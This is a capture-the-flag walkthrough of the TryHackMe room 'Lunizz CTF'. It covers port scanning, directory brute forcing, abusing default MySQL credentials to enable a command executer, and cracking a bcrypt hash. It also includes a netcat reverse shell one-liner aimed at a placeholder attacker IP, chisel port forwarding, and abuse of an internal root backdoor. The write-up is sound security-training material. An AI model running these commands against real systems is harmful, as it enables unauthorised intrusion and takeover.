Feb 25, 2021
Lunizz CTF -TryHackMe
This is a write-up for another TryHackMe’s rooms named “Lunizz CTF”. This room is available here:
As always lets starts our enumeration process to find out what services are running on the target.
Enumeration
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.190.71
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.190.71 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:34 EST
Nmap scan report for 10.10.190.71
Host is up (0.024s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
4444/tcp open krb524
5000/tcp open upnpNmap done: 1 IP address (1 host up) scanned in 13.41 seconds
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:38 EST
Nmap scan report for 10.10.190.71
Host is up (0.056s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
| 256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_ 256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.32-0ubuntu0.18.04.1
| Thread ID: 4
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongPassword, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, SwitchToSSLAfterHandshake, SupportsCompression, FoundRows, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: iM\x08P=\x1A "M}K^\x16jnU\x1Cv\x10]
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.32_Auto_Generated_Server_Certificate
| Not valid before: 2020-12-10T19:29:01
|_Not valid after: 2030-12-08T19:29:01
|_ssl-date: TLS randomness does not represent time
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| Wrong Password
| NULL:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| SSLSessionReq:
| Can you decode this for me?
|_ ZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, Kerberos, LDAPSearchReq, NULL, NotesRPC, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, giop, oracle-tns:
| OpenSSH 5.1
|_ Unable to load config info from /usr/local/ssl/openssl.cnf
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4444-TCP:V=7.91%I=7%D=2/24%Time=6036C75F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,31,"Can\x20you\x20decode\x20this\x20for\x20me\?\ncmFuZG9tcGFzc3dvcmQ
SF:=\n")%r(GetRequest,3F,"Can\x20you\x20decode\x20this\x20for\x20me\?\ncmF
SF:uZG9tcGFzc3dvcmQ=\nWrong\x20Password")%r(SSLSessionReq,41,"Can\x20you\x
SF:20decode\x20this\x20for\x20me\?\nZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==\n
SF:");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.91%I=7%D=2/24%Time=6036C759%P=x86_64-pc-linux-gnu%r(NU
SF:LL,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\
SF:x20/usr/local/ssl/openssl\.cnf")%r(GenericLines,46,"OpenSSH\x205\.1\nUn
SF:able\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\
SF:.cnf")%r(SMBProgNeg,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config
SF:\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(RPCCheck,46,"OpenSS
SF:H\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local
SF:/ssl/openssl\.cnf")%r(DNSStatusRequestTCP,46,"OpenSSH\x205\.1\nUnable\x
SF:20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")
SF:%r(SSLSessionReq,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x2
SF:0info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(TerminalServerCookie,4
SF:6,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/
SF:usr/local/ssl/openssl\.cnf")%r(TLSSessionReq,46,"OpenSSH\x205\.1\nUnabl
SF:e\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cn
SF:f")%r(Kerberos,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20i
SF:nfo\x20from\x20/usr/local/ssl/openssl\.cnf")%r(X11Probe,46,"OpenSSH\x20
SF:5\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/
SF:openssl\.cnf")%r(FourOhFourRequest,46,"OpenSSH\x205\.1\nUnable\x20to\x2
SF:0load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(LDAP
SF:SearchReq,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x
SF:20from\x20/usr/local/ssl/openssl\.cnf")%r(SIPOptions,46,"OpenSSH\x205\.
SF:1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/ope
SF:nssl\.cnf")%r(NotesRPC,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20con
SF:fig\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(oracle-tns,46,"O
SF:penSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/
SF:local/ssl/openssl\.cnf")%r(giop,46,"OpenSSH\x205\.1\nUnable\x20to\x20lo
SF:ad\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 22.04 ms 10.8.0.1
2 22.81 ms 10.10.190.71OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
Port 22 SSH version is stable and there are no know vulnerabilities. Port 80 has a web server which we will explore more in the next section. MySql is running on port 3306.Port 4444 exposes 2 password which are base64 encoded which may be used later on.Port 5000 seems to be running OpenSSH 5.1,which is a very old SSH version.We will explore it later.
Directory Brute Forcing with FFUF
We saw port 80 is open, so let’s brute force the directories and files which are exposed by this web server using ffuf:
ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c /'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v1.2.1
________________________________________________ :: Method : GET
:: URL : http://10.10.190.71/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________index.php [Status: 200, Size: 10917, Words: 3499, Lines: 375]
instructions.txt [Status: 200, Size: 338, Words: 39, Lines: 13]
hidden [Status: 301, Size: 313, Words: 20, Lines: 10]
whatever [Status: 301, Size: 315, Words: 20, Lines: 10]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10917, Words: 3499, Lines: 375]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 475 req/sec :: Duration: [0:18:17] :: Errors: 0 ::
We saw few interesting results above.The “whatever” directory looks interesting as this indicates that we can run commands on the server,but the mode looks to be disabled:
What is the default password for mysql?
From the FFUF scan we saw a file named “instructions.txt”, so lets open it up in a browser:
As we can see we found a user for mysql and a corresponding default password.Lets connect to the database using this user and password:
mysql -u runcheck -h 10.10.20.133 -p
And yes we can connect to the database.Let’s explore the database by running the following commands:
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| runornot |
+--------------------+
2 rows in set (0.019 sec)MySQL [(none)]> use runornot;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
MySQL [runornot]> show tables;
+--------------------+
| Tables_in_runornot |
+--------------------+
| runcheck |
+--------------------+
1 row in set (0.019 sec)MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
| 0 |
+------------+
1 row in set (0.028 sec)MySQL [runornot]>
I can’t run commands, there must be a mysql column that controls command executer:
From the Table “runcheck”, we were able to find the name of the column which looks to be controlling the command executer as it’s value is 0 currently. We can update this value to 1 and check if we can exeute something.
MySQL [runornot]> UPDATE runcheck SET [REDACTED] = 1;
Query OK, 1 row affected (0.030 sec)
Rows matched: 1 Changed: 1 Warnings: 0MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
| 1 |
+------------+
1 row in set (0.018 sec)MySQL [runornot]>
Now as the columns value is update, lets check if we can execute commands:
Indeed we can!
a folder shouldn’t be…
Lets execute “ls -lrt /” and we will get our answer of the above question.
Reverse Shell
From the command executer we can also get a reverse shell now.Execute the following from the executer after staring a netcat listener on your kali/attacker machine:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 9999 >/tmp/f
Yes, we got the shell:
Upgrade Shell
Upgrade and stabilize the shell which we got by running the following commands:
/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm
Privilege Escalation
Transfer LinPEAS.sh on to the target and run it.We can see that something is running on internal port 8080:
Also we found a directory /var/backups/.scripts that explains what is running on ports 4444 and 5000, which turns out to be rabbit holes.
Exploring the directory /proct which we found earlier and also highlighted by LinPEAS we found a python file with the following code:
www-data@lunizz:/$ cat /proct/pass/bcrypt_encryption.py
import bcrypt
import base64password = # https://www.youtube.com/watch?v=-tJYN-eG1zk&ab_channel=QueenOfficial
bpass = password.encode('ascii')
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), bcrypt.gensalt())
print(hashAndSalt)salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
# I wrote this code last year and i didnt save password verify line... I need to find my password
The YouTube link gives us the hint that the password can be in rockyou.txt word list and this and the code above explains that the hash is a bcrypt hash .So let’s crack it with john the ripper:
john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
where hash.txt contains the hash. This still didn’t cracked the password.
We will use the code given above to write a python script that will use the salt and bcrypt the passwords from rockyou.txt and compare them with the hash given(salt is actually the part of the hash which is confusingly named the variable named “salt” in the script):
This will take a lot of time to crack the password and it will fail for some passwords in rockyou.txt as they contain some special characters.It is best to remove those passwords from the list as you encounter them and remove the passwords which have already been tested till now.
[**UPDATE**]
From python docs , we can add an ignore handler on line 10 in the script above. This will handle the special characters automatically and there should be no need to manipulate the rockyou.txt.
hi adam, do you remember our place?
Now do switch user to “adam” using this password as the file “/proct/pass/bcrypt_encryption.py” was owned by the user “adam”. Exploring the home directory, you will find the file which contains the password for mason:
adam@lunizz:~$ cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt
do you remember our place
i love there it's soo calming
i will make that lights my password--https://www.google.com/maps/@68.5090469,27.481808,3a,75y,313.8h,103.6t/data=!3m6!1e1!3m4!1skJPO1zlKRtMAAAQZLDcQIQ!3e2!7i10000!8i5000adam@lunizz:~$
Open the link and it will reveal the password.
user.txt
Now switch user to the user “mason” with this new password found and we will find the user.txt on mason’s home directory:
root.txt
We saw with LinPEAS that something is running on Internal port 6666. We can set up port forwarding on to our kali machine and can access this internal port. We will use chisel for port forwarding:
On Kali run chisel as server:
./chisel server -p 9000 --reverse -v
On Target run chisel as a client:
./chisel client 10.8.98.192:9000 R:10.8.98.192:8080:127.0.0.1:8080
Here chisel which is running as a client will connect to the server(chisel running on kali machine on port 9000) and will ‘R’edirect the traffic from kali machine(10.8.98.192 in my case) from port 8080 to the internal port 8080 on the Target Machine.
Accessing http://10.8.98.192:8080 on the kali machine, we got Mason’s Root Backdoor.:
Intercept this request in Burp and you will notice that the request/response is send to the server using PHP and from above we need to send request with password and command type to access the backdoor. Taking example from here, request can be send to the target like this:
Let’s send the request using php from the command line using the above script:
So we need to use Mason’s password and send the request’s again with cmd type as lsla:
This worked! and the contents are the file listing of the root directory. Now this time send the request with passwd as the command type:
This changed the password of the root user. Let’s switch user to root by using this new password:
This also worked and found the root flag at /root/root.txt
That’s it.
